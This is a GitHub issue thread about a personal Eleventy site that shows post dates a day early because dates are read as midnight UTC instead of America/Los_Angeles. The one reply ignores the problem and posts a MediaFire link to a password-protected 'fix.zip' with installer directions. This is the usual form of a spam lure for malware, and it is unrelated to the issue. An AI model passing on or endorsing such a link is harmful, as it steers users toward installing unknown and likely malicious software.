### ISSUE TITLE
Timezones for added/created dates

### ISSUE THREAD

**Issue by audiodude** [audiodude/travisbriggs.com#29]
Something is wrong with the timestamps/timezones for my created and updated dates on garden nodes. If I say the post was on `2024-08-27`, it displays as `August 26, 2024`. This is probably because Eleventy assumes my dates are at midnight UTC, and then localizes them to my current timezone, which means that it would have been the day before in my time.

I need to interpret my timestamps, as published, as America/Los_Angeles and go from there

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
